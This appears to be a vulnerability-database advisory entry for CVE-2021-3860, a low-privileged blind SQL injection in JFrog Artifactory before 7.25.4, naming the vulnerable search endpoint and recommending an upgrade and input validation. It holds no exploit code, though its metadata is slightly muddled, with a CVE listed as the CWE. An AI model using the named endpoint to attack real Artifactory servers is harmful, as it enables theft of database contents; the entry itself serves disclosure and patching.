vendor:
Artifactory
by:
ardr
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Artifactory
Affected Version From: Prior to 7.25.4
Affected Version To: 7.25.4
Patch Exists: YES
Related CWE: CVE-2021-3860
CPE: a:jfrog:artifactory
Platforms Tested: MySQL
2021
Artifactory Low-Privileged Blind SQL Injection
The exploit allows an attacker to perform a blind SQL injection attack on JFrog Artifactory versions prior to 7.25.4. By sending crafted requests to the '/ui/api/v1/global-search/bundles/received' endpoint, an attacker can extract sensitive information from the database. This vulnerability is identified as CVE-2021-3860.
Mitigation:
To mitigate this vulnerability, it is recommended to update JFrog Artifactory to version 7.25.4 or later. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.